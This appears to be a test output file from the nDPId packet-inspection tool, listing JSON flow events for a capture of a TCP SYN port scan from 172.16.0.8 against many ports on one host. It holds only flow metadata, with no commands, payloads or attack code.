+00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":773,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":617,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":773,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":617,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1278275058031,"flow_last_seen":1278275058093,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":31337,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1278275058031,"flow_last_seen":1278275058093,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":31337,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":824,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":617,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":824,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":617,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1832,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061172,"flow_last_seen":1278275061172,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":625,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1832,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061172,"flow_last_seen":1278275061172,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":625,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1909,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061275,"flow_last_seen":1278275061275,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":625,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1909,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061275,"flow_last_seen":1278275061275,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":625,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1927,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061310,"flow_last_seen":1278275061310,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":60020,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1927,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061310,"flow_last_seen":1278275061310,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":60020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1967,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061410,"flow_last_seen":1278275061410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":60020,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1967,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061410,"flow_last_seen":1278275061410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":60020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":631,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":631,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6779,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6779,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1583,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":636,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1583,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":636,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":710,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6779,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":710,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6779,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1667,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":636,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1667,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":636,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":62078,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":62078,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":62078,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":62078,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6788,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6788,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1740,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6789,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1740,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6789,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6788,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6788,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1814,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6789,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1814,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6789,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":646,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":646,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6792,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6792,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":648,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":648,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1554,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":648,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 